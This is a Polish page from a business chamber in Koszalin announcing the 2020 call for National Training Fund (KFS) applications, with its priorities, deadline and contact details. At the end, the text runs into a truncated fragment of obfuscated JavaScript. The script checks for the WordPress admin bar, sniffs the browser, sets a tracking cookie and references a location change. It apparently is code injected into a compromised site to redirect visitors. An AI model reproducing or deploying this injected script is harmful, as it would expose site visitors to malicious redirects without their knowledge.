Nabór wniosków ze środków Krajowego Funduszu Szkoleniowego | Północna Izba Gospodarcza w Koszalinie

NABÓR WNIOSKÓW KFS w terminie 20.01.2020 r. – 07.02.2020 r.

Powiatowy Urząd Pracy w Koszalinie ogłasza nabór wniosków ze środków Krajowego Funduszu Szkoleniowego na sfinansowanie działań obejmujących kształcenie ustawiczne pracowników i pracodawcy.

Aby skorzystać ze środków KFS pracownik/pracodawca musi spełnić wymagania określone w co najmniej jednym z niżej wymienionych priorytetów MRPiPS:

PRIORYTET nr 1 – wsparcie kształcenia ustawicznego dla osób powracających na rynek pracy po przerwie związanej ze sprawowaniem opieki nad dzieckiem;

PRIORYTET nr 2 – wsparcie kształcenia ustawicznego osób po 45 roku życia;

PRIORYTET nr 3- wsparcie zawodowego kształcenia ustawicznego w zidentyfikowanych w danym powiecie lub województwie zawodach deficytowych; – lista zawodów deficytowych

PRIORYTET nr 4 – wsparcie kształcenia ustawicznego w związku z rozwojem w firmach technologii i zastosowaniem wprowadzanych przez firmy narzędzi pracy;

PRIORYTET nr 5 – wsparcie kształcenia ustawicznego w obszarach/branżach kluczowych dla rozwoju powiatu/województwa wskazanych w dokumentach strategicznych/planach rozwoju;

PRIORYTET nr 6 – wsparcie realizacji szkoleń dla instruktorów praktycznej nauki zawodu bądź osób mających zamiar podjęcia się tego zajęcia, opiekunów praktyk zawodowych i opiekunów stażu uczniowskiego oraz szkoleń branżowych dla nauczycieli kształcenia zawodowego;

PRIORYTET nr 7 – wsparcie kształcenia ustawicznego pracowników zatrudnionych w podmiotach posiadających status przedsiębiorstwa społecznego, wskazanych na liście przedsiębiorstw społecznych prowadzonej przez MRPiPS, członków lub pracowników spółdzielni socjalnych lub pracowników Zakładów Aktywności Zawodowej.

Zgodnie z Regulaminem finansowania kosztów kształcenia ustawicznego pracowników i pracodawcy ze środków Krajowego Funduszu Szkoleniowego (KFS) przez Powiatowy Urząd Pracy w Koszalinie pracodawcy mogą uzyskać wsparcie ze środków KFS raz w roku.

Wnioski przyjmowane będą w terminie od 20.01.2020 r. do 07.02.2020 r.

w Powiatowym Urzędzie Pracy w Koszalinie,

ul. Racławicka 13, pokój 313 III piętro – sekretariat.

Dodatkowe informacje w danym zakresie można uzyskać pod numerem tel. 94 3455755. 'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m